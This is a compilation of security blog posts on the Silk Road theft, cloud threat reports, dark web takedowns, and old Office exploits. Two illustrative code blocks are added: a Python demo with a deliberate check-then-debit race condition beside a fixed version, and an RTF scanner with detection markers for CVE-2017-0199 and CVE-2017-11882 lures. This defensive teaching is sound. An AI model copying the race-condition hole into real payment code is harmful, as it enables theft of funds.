Dark Web – Sec Intel

How the Silk Road Affair Changed Law Enforcement

30 January 2023 at 09:00

The Silk Road was the first modern dark web marketplace, an online place for anonymously buying and selling illegal products and services using Bitcoin.

Ross Ulbricht created The Silk Road in 2011 and operated it until 2013 when the FBI shut it down. Its creator was eventually arrested and sentenced to life in prison.

But in a plot twist right out of a spy novel, a cyber attacker stole thousands of bitcoins from Silk Road and hid them away. It took law enforcement years to find the perpetrator. By then, the Bitcoins were worth more than $3.3 billion.

The extended law enforcement operation was difficult and complex. But ultimately, this saga set the stage for future action against darknet marketplaces.

Here’s what happened.

How Silk Road Worked

Two technologies assured anonymity for both sellers and buyers on Silk Road: The Tor network and Bitcoin. The Tor network is a browser and service that routes internet traffic through a series of servers. Each of these servers then hides the IP address so that it becomes untraceable.

Bitcoin is a digital currency created in 2009. It allows for peer-to-peer transactions without the need for a central authority, such as a bank or government. Instead, the blockchain records, secures and authenticates these transactions.

People bought and sold a wide range of products and services on the Silk Road. By 2013, however, some 70% of the purchases were drugs.

Tracing drugs shipped by mail to temporary P.O. boxes became The Silk Road’s undoing. This allowed law enforcement to arrest Ulbricht’s freelance employees and piece together the Silk Road story.

Still, the Tor network prevented law enforcement from nailing down exactly who was behind Silk Road. That was the case until an FBI agent got a lucky break. A Reddit post warned that Silk Road’s IP address had become visible online. The agent probed the claim by posting various data on Silk Road, then used software to analyze the traffic until he could expose the IP address.

After some incredible and persistent desk-jockey sleuthing, Ulbricht, who used the online nickname “Dread Pirate Roberts”, was eventually caught logged into the site from a public library. He was arrested and charged with money laundering, computer hacking crimes, conspiracy to traffic narcotics and attempted murder to silence at least five people who threatened to unmask Silk Road.

Ulbricht turned down a plea deal offering a minimum 10-year sentence, which turned out to be a big mistake. He was convicted, given five sentences, including two life sentences without parole, and fined $183 million.

Mystery of the Missing Billions

Initiated by U.S. Senator Charles Schumer, the DEA and Department of Justice conducted a long and intense investigation to find the billions in Bitcoin stolen from Silk Road before the site’s shutdown.

In 2012, a man named James Zhong created some nine Silk Road accounts anonymously. He then triggered more than 140 transactions in a way that tricked Silk Road’s withdrawal processing system into releasing around 50,000 Bitcoins into those accounts.

He exploited a flaw in the system: he made an initial deposit, then rapidly requested a withdrawal smaller than the deposit and repeated that same withdrawal many times within a second, before the system could register that the account was depleted. Zhong repeated this on multiple accounts, making a total of 140 withdrawals.
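The flaw described above is a textbook check-then-act race: the balance is checked, and only later debited, so a burst of requests can all pass the check against the same starting balance. The Python below is an added illustration, not code from the article or from Silk Road itself (whose implementation is not shown here): it contrasts a withdrawal routine that checks and debits in two unsynchronized steps with one that does both under a single lock, and fires a burst of concurrent requests at each. The deposit, amount, request count and latency window are constructed values.

```python
import threading
import time

# Constructed: stands in for the latency between the balance check and the
# debit write in the original withdrawal processor.
WINDOW = 0.1


class RacyWallet:
    """Vulnerable pattern: the balance check and the debit are two separate
    steps, and nothing stops concurrent requests from interleaving between them."""

    def __init__(self, balance: int) -> None:
        self.balance = balance
        self.withdrawals: list[int] = []  # ledger of amounts actually paid out

    def withdraw(self, amount: int) -> bool:
        if self.balance < amount:         # step 1: check (time-of-check)
            return False
        time.sleep(WINDOW)                # window that a burst of requests slips through
        self.balance -= amount            # step 2: debit (time-of-use)
        self.withdrawals.append(amount)
        return True


class SafeWallet:
    """Hardened pattern: check and debit happen atomically under one lock, so the
    second request in a burst sees the balance the first one left behind.
    (In a database the equivalent is a single conditional update such as
    UPDATE ... SET balance = balance - :amt WHERE balance >= :amt.)"""

    def __init__(self, balance: int) -> None:
        self.balance = balance
        self.withdrawals: list[int] = []
        self._lock = threading.Lock()

    def withdraw(self, amount: int) -> bool:
        with self._lock:
            if self.balance < amount:
                return False
            time.sleep(WINDOW)            # same latency, but nobody else can check meanwhile
            self.balance -= amount
            self.withdrawals.append(amount)
            return True


def burst(wallet, amount: int, requests: int) -> dict:
    """Fire `requests` concurrent withdrawals of `amount` at `wallet` and report
    how many were accepted, how much was paid out and the closing balance."""
    threads = [threading.Thread(target=wallet.withdraw, args=(amount,))
               for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return {
        "accepted": len(wallet.withdrawals),
        "paid_out": sum(wallet.withdrawals),
        "balance": wallet.balance,
    }


def demo(deposit: int = 500, amount: int = 400, requests: int = 5):
    """Run the same burst against both wallets. Only one withdrawal of 400
    fits in a 500 deposit, yet the racy wallet accepts all five."""
    racy = burst(RacyWallet(deposit), amount, requests)
    safe = burst(SafeWallet(deposit), amount, requests)
    return racy, safe


if __name__ == "__main__":
    racy, safe = demo()
    print("racy:", racy)  # pays out far more than was ever deposited
    print("safe:", safe)  # exactly one withdrawal accepted, balance 100 left
```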

Zhong then moved his ill-gotten proceeds into a range of addresses to conceal who owned and controlled the Bitcoins.

Almost five years after this theft, Zhong benefited from a hard fork coin split, where Bitcoin split into two cryptocurrencies: traditional Bitcoin and Bitcoin Cash. He converted the latter back to Bitcoin, which amounted to 3,500 Bitcoin.

He then used an exchange to convert the stolen bitcoin to dollars. This made it easy for investigators to trace the transaction. They knew he was out there somewhere and waited for him to reveal himself.

To Catch a Bitcoin Thief

After the government had been investigating the crime for a decade, they finally got tipped off when a man in Athens, Georgia, called the police to say that he was burglarized and that the thieves stole “a lot of Bitcoin”, which attracted the attention of the IRS. That man was James Zhong.

Police raided his home and found Bitcoin hidden in a “single-board computer” stashed in a popcorn tin in Zhong’s bathroom. They also found $662,000 in cash, along with bars of gold and silver, in a floor safe.

In November of 2021, the U.S. Attorney for the Southern District of New York announced that a law enforcement operation seized more than 50,676 Bitcoin worth an incredible $3.36 billion.

Zhong pleaded guilty to one count of wire fraud, which carries a maximum sentence of 20 years in prison. He is scheduled to be sentenced on February 22, 2023, and is currently out on bail.

How the Silk Road Affair Changed Crime and Law Enforcement

The value of the seizure, the second largest ever after the $3.6 billion in stolen crypto linked to the 2016 hack of Bitfinex, caused federal law enforcement to prioritize crypto-related crimes, adding expertise and developing methods for tracing such transactions.

To cyber criminals — and also many law-abiding citizens who shared Ulbricht’s utopian libertarian views advocating for the freedom for people to buy and sell anything they like — Ulbricht’s double life sentence without the possibility of parole was a shock and an outrage. Still, no doubt, it strongly discouraged participation in dark web sites for people within reach of Western law enforcement. It also motivated everyone involved in such marketplaces to up their security and anonymity.

The post How the Silk Road Affair Changed Law Enforcement appeared first on Security Intelligence.

Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments

14 September 2022 at 06:00

While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.

Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:

  • Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed.
  • More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.
  • Cloud Account Sales Gain Grounds in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts now being advertised on the dark web, with remote desktop protocol and compromised credentials being the most popular cloud account sales making rounds on illicit marketplaces.

Unpatched Software: #1 Cause of Cloud Compromise

As the rise of IoT devices drives more and more connections to cloud environments, the potential attack surface grows, introducing critical challenges that many businesses are experiencing, such as proper vulnerability management. Case in point — the report found that more than a quarter of studied cloud incidents were caused by known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most of the exploited vulnerabilities observed primarily affected the on-premises version of applications, sparing the cloud instances.

As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.

These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.

Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement

The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.

The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they’re properly securing their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads, to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, but it enables them to place efficient security controls around it, supported by proper security technologies and resources.

Dark Web Marketplaces Lean Heavier into Cloud Account Sales

With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.

The going price for this type of access is significantly low making these accounts easily attainable to the average bidder. The price for RDP access and compromised credentials average $7.98 and $11.74 respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services that were stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.

As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.

If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET you can register here.

If you’d like to schedule a consult with IBM Security X-Force visit: www.ibm.com/security/xforce?schedulerform

The post Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments appeared first on Security Intelligence.

X-Force Report: No Shortage of Resources Aimed at Hacking Cloud Environments

15 September 2021 at 06:05

As cybercriminals remain steadfast in their pursuit of unsuspecting ways to infiltrate today’s businesses, a new report by IBM Security X-Force highlights the top tactics of cybercriminals, the open doors users are leaving for them and the burgeoning marketplace for stolen cloud resources on the dark web. The big takeaway from the data is businesses still control their own destiny when it comes to cloud security. Misconfigurations across applications, databases and policies could have stopped two-thirds of breached cloud environments observed by IBM in this year’s report.

IBM’s 2021 X-Force Cloud Security Threat Landscape Report has expanded from the 2020 report with new and more robust data, spanning Q2 2020 through Q2 2021. Data sets we used include dark web analysis, IBM Security X-Force Red penetration testing data, IBM Security Services metrics, X-Force Incident Response analysis and X-Force Threat Intelligence research. This expanded dataset gave us an unprecedented view across the whole technology estate to make connections for improving security. Here are some quick highlights:

  • Configure it Out — Two out of three breached cloud environments studied were caused by improperly configured Application Programming Interfaces (APIs). X-Force incident responders also observed virtual machines with default security settings that were erroneously exposed to the Internet, including misconfigured platforms and insufficiently enforced network controls.
  • Rulebreakers Lead to Compromise — X-Force Red found password and policy violations in the vast majority of cloud penetration tests conducted over the past year. The team also observed a significant growth in the severity of vulnerabilities in cloud-deployed applications, while the number of disclosed vulnerabilities in cloud-deployed applications rocketed 150% over the last five years.
  • Automatic for the Cybercriminals — With nearly 30,000 compromised cloud accounts for sale at bargain prices on dark web marketplaces and Remote Desktop Protocol accounting for 70% of cloud resources for sale, cybercriminals have turnkey options to further automate their access to cloud environments.
  • All Eyes on Ransomware & Cryptomining — Cryptominers and ransomware remain the top dropped malware into cloud environments, accounting for over 50% of detected system compromises, based on the data analyzed.

Modernization Is the New Firewall

More and more businesses are recognizing the business value of hybrid cloud and distributing their data across a diverse infrastructure. In fact, the 2021 Cost of a Data Breach Report revealed that breached organizations implementing a primarily public or private cloud approach suffered approximately $1 million more in breach costs than organizations with a hybrid cloud approach.

With businesses seeking heterogeneous environments to distribute their workloads and better control where their most critical data is stored, modernization of those applications is becoming a point of control for security. The report is putting a spotlight on security policies that don’t encompass the cloud, increasing the security risks businesses are facing in disconnected environments. Here are a few examples:

  • The Perfect Pivot — Enterprises struggle to monitor and detect threats in their cloud environments today. This has contributed to threat actors pivoting from on-premise into cloud environments, making this one of the most frequently observed infection vectors targeting cloud environments — accounting for 23% of incidents IBM responded to in 2020.
  • API Exposure — Another top infection vector we identified was improperly configured assets. Two-thirds of studied incidents involved improperly configured APIs. APIs lacking authentication controls can allow anyone, including threat actors, access to potentially sensitive information. On the other side, APIs being granted access to too much data can also result in inadvertent disclosures.

Many businesses don’t have the same level of confidence and expertise when configuring security controls in cloud computing environments compared to on-premise, which leads to a fragmented and more complex security environment that is tough to manage. Organizations need to manage their distributed infrastructure as one single environment to eliminate complexity and achieve better network visibility from cloud to edge and back. By modernizing their mission critical workloads, not only will security teams achieve speedier data recovery, but they will also gain a vastly more holistic pool of insights around threats to their organization that can inform and accelerate their response.

Trust That Attackers Will Succeed & Hold the Line

Evidence is mounting every day that the perimeter has been obliterated and the findings in the report just add to that corpus of data. That is why taking a zero trust approach is growing in popularity and urgency. It removes the element of surprise and allows security teams to get ahead of any lack of preparedness to respond. By applying this framework, organizations can better protect their hybrid cloud infrastructure, enabling them to control all access to their environments and to monitor cloud activity and proper configurations. This way organizations can go on offense with their defense, uncovering risky behaviors and enforcing privacy regulation controls and least privilege access. Here’s some of the evidence derived from the report:

  • Powerless Policy — Our research suggests that two-thirds of studied breaches into cloud environments would have likely been prevented by more robust hardening of systems, such as properly implementing security policies and patching.
  • Lurking in the Shadows — “Shadow IT”, cloud instances or resources that have not gone through an organization’s official channels, indicate that many organizations aren’t meeting today’s baseline security standards. In fact, X-Force estimates the use of shadow IT contributed to over 50% of studied data exposures.
  • Password is “admin 1” — The report illustrates X-Force Red data accumulated over the last year, revealing that the vast majority of the team’s penetration tests into various cloud environments found issues with either passwords or policy adherence.

The recycled use of these attack vectors emphasizes that threat actors are repeatedly relying on human error for a way into the organization. It’s imperative that businesses and security teams operate with the assumption of compromise to hold the line.

Dark Web Flea Markets Selling Cloud Access

Cloud resources are providing an excess of corporate footholds to cyber actors, drawing attention to the tens of thousands of cloud accounts available for sale on illicit marketplaces at a bargain. The report reveals that nearly 30,000 compromised cloud accounts are on display on the dark web, with sales offers that range from a few dollars to over $15,000 (depending on geography, amount of credit on the account and level of account access) and enticing refund policies to sway buyers’ purchasing power.

But that’s not the only cloud “tool” for sale on dark web markets, with our analysis highlighting that Remote Desktop Protocol (RDP) accounts for more than 70% of cloud resources for sale — a remote access method that greatly exceeds any other vector being marketed. While illicit marketplaces are the optimal shopping grounds for threat actors in need of cloud hacks, concerning us the most is a persistent pattern in which weak security controls and protocols — preventable forms of vulnerability — are repeatedly exploited for illicit access.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2021 X-Force Cloud Security Threat Landscape here.

Want to hear from an expert? Schedule a consultation with an X-Force team member and register for our cloud security webinar to learn more.

The post X-Force Report: No Shortage of Resources Aimed at Hacking Cloud Environments appeared first on Security Intelligence.

‘DarkMarket’ Dark Web Marketplace Taken Down in International Operation

11 February 2021 at 10:00

A globe-spanning group of law enforcement agencies took down DarkMarket, an underground dark web marketplace. The European Union Agency for Law Enforcement Cooperation (Europol) announced the successful operation on Jan. 12. DarkMarket was a hub for threat actors to buy and sell counterfeit products. Stolen credit card details and malware were up for grabs, as well as other illicit goods and services.

At the time of the takedown, DarkMarket was the world’s largest illegal dark web marketplace with about 500,000 users and 2,400 sellers. Its more than 320,000 sales involved over 4,650 bitcoin (worth about $157 million) and 12,800 Monero (about $1.8 million).

Dark Market Operator Arrested

The takedown became possible after an arrest by the Central Criminal Investigation Department in Oldenburg, Germany. They arrested an Australian citizen, the alleged operator of DarkMarket, near the German-Danish border, Europol says.

The cyber crime unit of the Koblenz Public Prosecutor’s Office then launched an investigation into this person and their dark web marketplace. This effort enabled officers to shut down the marketplace. They seized over 20 of its servers located in Moldova and Ukraine.

Europol organized information exchange and provided specialist support. The agency says the international partners planned on using the data stored on those servers to go after the site’s moderators, sellers and buyers.

Other Dark Web Marketplace Stings

Law enforcement agencies across the world seized several dark web markets over the past few years.

For instance, the FBI worked with digital crime investigators, as well as European law enforcement to obtain a warrant for the seizure of dark web index Deep Dot Web in May 2019. Law enforcement agencies based in Israel, France, Germany, the Netherlands and Brazil made arrests as part of the takedown.

A few months later, the U.S. Justice Department announced the indictment of a South Korean national for running Welcome to Video, then the largest dark web child abuse website. IRS Criminal Investigation first seized Welcome to Video’s servers in 2018. Following this, law enforcement in the U.S. and 11 other countries arrested and filed charges against 337 of the site’s users.

In addition, law enforcement arrested 179 people, seized 500 kilograms of illegal drugs and confiscated $6.5 million in funds in September 2020 in a dark web marketplace takedown.

How to Prevent Your Data from Ending up on the Dark Web

Law enforcement agencies across the world continue to prosecute criminals who hide in the dark web. These threat actors also continue to use the dark web to prey upon everyday users.

Keeping this in mind, it’s important that businesses and other online entities work to keep their sensitive data off a dark web marketplace. The first thing they should consider doing is applying encryption to their data. Doing so will not only help them comply with a number of data protection rules. It will also help them render their data useless if it ends up on a dark web marketplace like DarkMarket.

From there, undo the silo in which data security resides. Data defense needs to function as part of a broader landscape. This itself will help keep that data safe. With that in mind, organizations can work to automate and manage their data security workflows across all departments.

The post ‘DarkMarket’ Dark Web Marketplace Taken Down in International Operation appeared first on Security Intelligence.

Darknet Cybersecurity: How Finance Institutions Can Defend Themselves

28 July 2020 at 11:08

Financial firms continue to move to digital-first deployments, as retail branches close, and people shift to remote work. This shift makes understanding and preventing even common darknet, or dark web, threats a priority.

Financial institutions need to understand what the dark web is, provide their security teams with the tools to explore it safely and prioritize areas of concern. Taken together, these actions can limit risk and improve regulatory compliance.

About the Darknet

Originally designed to hide users’ activities and identities, the dark web, also known as darknet, quickly became an obstacle as malicious actors leveraged tools, such as The Onion Router (TOR) to create a digital marketplace where nothing was off-limits or beyond reach. From illegal items to stolen data, there’s a good chance someone on the dark web has obtained, or has access to exactly what bad actors are after.

Not surprisingly, financial data remains one of the most popular purchases on the dark web. Credentials for high-value bank accounts start at just $500, and credit card data is sold in large volumes at low cost. Financial firms are often forced to close compromised accounts and refund fraudulent transactions, since there is little recourse when it comes to finding the origin of this pilfered information.

Dark Web: The Deep and the Darkness

No discussion of the dark web is complete without a quick primer on the difference between deep and dark deployments.

The deep web is classified as data that isn’t indexed and readily available online. While this type of data makes up 90% of the internet at large, the dark web accounts for just 0.005%, or around 8,400 live sites.

Financial firms regularly interact with the deep web. It’s where secured client data and essential enterprise assets are stored. The deep web is fundamental for finance and critical for consumer confidence. If secured financial information was readily available with a simple online search — which still happens with alarming regularity — clients would quickly abandon banks in favor of more secure alternatives.

The dark web, meanwhile, is a place without rules or regulation. Both legal and illegal activities exist side by side on the dark web, unchecked by regulatory or operational obligations. And accessing the darknet isn’t complicated. Users typically leverage the Tor Browser to encrypt and obscure their location and IP address. Still, it’s nothing like the surface web.

The Economies of the Dark Web

The darknet isn’t just a free-for-all of fraudulent transactions and stolen credentials. As noted by Financial Management, this twilight trading ground has developed its own economy. It is one that follows the laws of supply and demand and sees criminal ‘vendors’ fighting for market share by offering top-tier products, lower prices and enhanced customer service.

This creates a kind of paradox. While the dark web economy doesn’t match the rest of the web in terms of design, it displays the same type of inventory and incentive tools and strategies as more common businesses. As a result, it’s critical for financial firms to take the same approach to dusk economies as those in the daylight, discovering as much information as possible.

This requires a shift in thinking. Rather than waiting for malicious actors or dark web buyers to compromise financial networks, banks must take an intelligence-based approach to data discovery. What information is available on the dark web? How much (if any) client data has been compromised? How have the bad actors made it available to potential purchasers?

Equipped with actionable insight, financial firms can begin developing proactive incident response. That could mean anything from changing account details before compromises happen to deploying security tools that better defend against theft. With the dark web now governed by supply and demand, making supply worthless is the quickest way for banks to boost their defense against shady economies.

How Your Cybersecurity Team Can Fight Back

It’s one thing to recognize the need to improve data gathering on the dark web; it’s another entirely for banks to put policy into practice.

So, how do financial firms actively protect themselves against bad actors?

It starts with an understanding of current infosec expectations, such as those described in the FFIEC Information Technology Examination Handbook. These guidelines can help banks identify potential weak points across current efforts to manage protected information. From there, they can implement effective network and access controls.

By knowing which areas need the most work, financial firms can prioritize essential infosec investments. No single dark web cybersecurity solution is enough to combat all emerging threats. Instead, organizations must adopt defensively diverse portfolios that include:

Expert Insight

Uncovering tactics and technologies used by darknet attackers is critical to improving current defenses. Human experts are the best defense. Banks must invest in security professionals capable of creating and cultivating dark web personas themselves. By becoming a trusted member of this shadow community, firms have a better chance of finding stolen data before it can be used to infiltrate accounts or compromise key systems. Then, they can integrate collected intelligence into existing defensive frameworks.

Active Listening

It’s not enough to know that data has been compromised or if attackers are attempting to breach financial networks. Firms need to know what’s being said about them on the darknet and how stolen information is being used.

For example, if banks can identify a cache of pilfered business account credentials for sale and observe interest from other users in purchasing this data, they can proactively close and re-secure these accounts to limit potential risk. With enough lead time, it’s also possible for teams to create honeypot accounts that allow attackers in but keep them contained. This, in turn, provides IT teams valuable threat vector data.

Machine Learning

While human desire and demand form the foundation of dark web functions, even the most experienced infosec experts can’t cover the entire economy at once. Advanced machine learning and artificial intelligence tools can help bridge the knowledge gap by analyzing current compromise patterns and predicting potential outcomes. This way, banks can identify top compromise targets and deploy purpose-built protections to limit the risk of darknet disclosure.

A Mirror, Darkly

As dark web economies evolve, a malicious mirror emerges. Fraudulent financial transactions have their own economy that mimics above-the-board deals. To deliver dark web security, organizations must look into the abyss, learn from it and leverage operational insight to defend against fraud.

The post Darknet Cybersecurity: How Finance Institutions Can Defend Themselves appeared first on Security Intelligence.

What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today

26 February 2020 at 06:05

As reported in the IBM X-Force Threat Intelligence Index 2020, X-Force research teams operate a network of globally distributed spam honeypots, collecting and analyzing billions of unsolicited email items every year. Analysis of data from these spam traps reveals which tactics attackers favor in malicious emails; in particular, threat actors continue to target organizations by exploiting two older Microsoft Office vulnerabilities, CVE-2017-0199 and CVE-2017-11882.

  • CVE-2017-0199 was first disclosed and patched in April 2017. It is a logic flaw in the way Office handles OLE2 linked objects: a malicious document carrying an embedded link causes Word to fetch a remote HTA file, which is then executed (typically VBScript that launches PowerShell) as soon as the victim opens the document. Unlike macro-based lures, the victim does not need to enable macros or accept any prompts; the document loads and runs a file of the attacker’s choosing.
  • CVE-2017-11882 was first disclosed and patched in November 2017. It is a stack buffer overflow in the Microsoft Equation Editor component of Microsoft Office (EQNEDT32.EXE) that allows remote code execution. Notably, the vulnerable component was 17 years old at the time of exploitation: it had been compiled in 2000 and left unchanged until Microsoft removed it from Office in 2018.
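Both families leave recognizable traces in the lure document itself, so a mail gateway can triage RTF attachments statically before anyone opens them. The following is an added example, not X-Force tooling or code from the original article: it decodes the hex-encoded object data in each `\objdata` group and looks for the auto-update control words and OLE2Link class that CVE-2017-0199 lures rely on, and for an Equation.3 object or the Equation Editor CLSID that CVE-2017-11882 documents carry. The three sample documents are constructed and are not real exploit files.

```python
"""Static triage of an RTF attachment for the two Office exploit families
discussed above. Added example, not X-Force tooling. It looks for:
  - \\objupdate / \\objautlink control words, which make an embedded object
    refresh when the document opens (the behaviour CVE-2017-0199 lures use to
    pull a remote HTA), plus the 'OLE2Link' class inside the object data;
  - an embedded object of class Equation.3 or carrying the Equation Editor
    CLSID {0002CE02-0000-0000-C000-000000000046}, the component CVE-2017-11882
    lives in;
  - a raw PE image inside the object data (a dropped payload).
The sample documents at the bottom are constructed for illustration.
"""
import re
import uuid

EQUATION_EDITOR_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046").bytes_le
AUTO_UPDATE_RE = re.compile(rb"\\obj(?:update|autlink)\b")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9._]+)")
OBJDATA_RE = re.compile(rb"\\objdata\b([^{}]*)")
NON_HEX_RE = re.compile(rb"[^0-9A-Fa-f]")


def decode_objdata(rtf: bytes):
    """Yield the raw OLE payload hidden as hex text in every \\objdata group."""
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = NON_HEX_RE.sub(b"", m.group(1))   # builders pad hex with whitespace/junk
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]                  # tolerate a truncated trailing nibble
        if hexdata:
            yield bytes.fromhex(hexdata.decode("ascii"))


def triage_rtf(rtf: bytes) -> dict:
    f = {
        "auto_update_object": AUTO_UPDATE_RE.search(rtf) is not None,
        "equation_editor_object": any(
            c.lower().startswith(b"equation") for c in OBJCLASS_RE.findall(rtf)),
        "ole2link_object": False,
        "embedded_pe": False,
    }
    for blob in decode_objdata(rtf):
        if EQUATION_EDITOR_CLSID in blob:
            f["equation_editor_object"] = True
        if b"OLE2Link" in blob or "OLE2Link".encode("utf-16-le") in blob:
            f["ole2link_object"] = True
        if b"MZ" in blob and b"This program cannot be run in DOS mode" in blob:
            f["embedded_pe"] = True
    # Equation Editor objects: after Microsoft removed the component, no business
    # document should need one, so treat them as block rather than review.
    if f["equation_editor_object"] or f["embedded_pe"] or (
            f["auto_update_object"] and f["ole2link_object"]):
        f["verdict"] = "block"
    elif f["auto_update_object"] or f["ole2link_object"]:
        f["verdict"] = "review"       # linked objects exist in legitimate documents too
    else:
        f["verdict"] = "allow"
    return f


def _hex(b: bytes) -> bytes:
    return b.hex().encode()


# Constructed samples (not real exploit documents).
SAMPLE_EQN_RTF = (
    b"{\\rtf1\\ansi{\\object\\objemb\\objw380\\objh260{\\*\\objclass Equation.3}"
    b"{\\*\\objdata "
    + _hex(b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"Equation.3\x00" + EQUATION_EDITOR_CLSID)
    + b"}}}"
)
SAMPLE_LINK_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw1\\objh1{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata "
    + _hex(b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"OLE2Link\x00" + b"\x00" * 16)
    + b"}}}"
)
SAMPLE_BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 Quarterly numbers attached, see page 2.\\par}"

if __name__ == "__main__":
    for name, doc in (("equation", SAMPLE_EQN_RTF), ("ole2link", SAMPLE_LINK_RTF),
                      ("benign", SAMPLE_BENIGN_RTF)):
        print(name, triage_rtf(doc)["verdict"])
```

Real builders obfuscate the RTF heavily (nested groups, junk control words, split hex), so the decoder above is a starting point rather than a complete parser; the point is that the markers survive the hex encoding and can be matched on the decoded bytes rather than on the raw text.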

These two vulnerabilities, both disclosed and patched in 2017, were the most frequently used of the top eight vulnerabilities observed in 2019. They were used in nearly 90 percent of malspam messages despite being well publicized and dated. These findings highlight how delays in patching allow cybercriminals to keep using old vulnerabilities and still see some success in their attacks.

2 Years and Still Going Strong

Beyond their popularity in malspam, the volume of 2019 network attacks against X-Force-monitored customers that attempted to exploit these two vulnerabilities was 25 times higher than the combined volume of network attacks attempting to exploit similar vulnerabilities that leverage Object Linking and Embedding (OLE).

Our analysts did not observe any commonality in the malicious payloads delivered after exploitation, which indicates that these vulnerabilities are the choice of a wide array of threat actors rather than of a small number of campaigns or adversary groups.

Figure 1: Observed usage of top CVEs in 2019 spam emails (Source: IBM X-Force)

Another noteworthy insight from the figure above is that most vulnerabilities commonly used by cybercriminals are old ones. None of the vulnerabilities leveraged in 2019 had been disclosed that same year, and only one was disclosed in 2018. The rest go back as far as 2003, further driving home the point that when it comes to malicious cyber activity, what’s old is new and what’s new is old.

The Allure of Older Vulnerabilities

Why would such a wide array of threat actors use the same two old and well-known exploits in so many of their attacks? There are a few possible explanations, but in essence these exploits are cheaper, better documented, battle-tested and more likely to succeed against legacy systems that are no longer being patched.

First, the exploits are convenient for an attacker because they require no user interaction beyond opening the document. Unlike macro-based lures, which require the attacker to convince the user to enable macros, documents exploiting these two vulnerabilities execute automatically when opened. This reduces the chance of arousing user suspicion and, accordingly, increases the rate of success.

Second, since so many different actors use these vulnerabilities, it can complicate attribution, as their widespread usage makes associating them with any particular individual or group difficult.

For example, IBM researchers recently observed threat actors leveraging these CVEs to deliver a variant of the X-Agent malware, which has historically been associated with a threat actor known to IBM as ITG05 (also known as APT28). That group has been attributed to Russia’s Main Intelligence Directorate. Yet while these vulnerabilities were being used by highly sophisticated actors, they were also being leveraged by low-end spammers dropping commodity malware through massive email campaigns.

The reuse of common exploits is a convenient way to muddy threat actor attribution, especially for groups that wish to remain anonymous in their operations. It can allow threat actors to hide among a large volume of activity, obfuscating their actions.

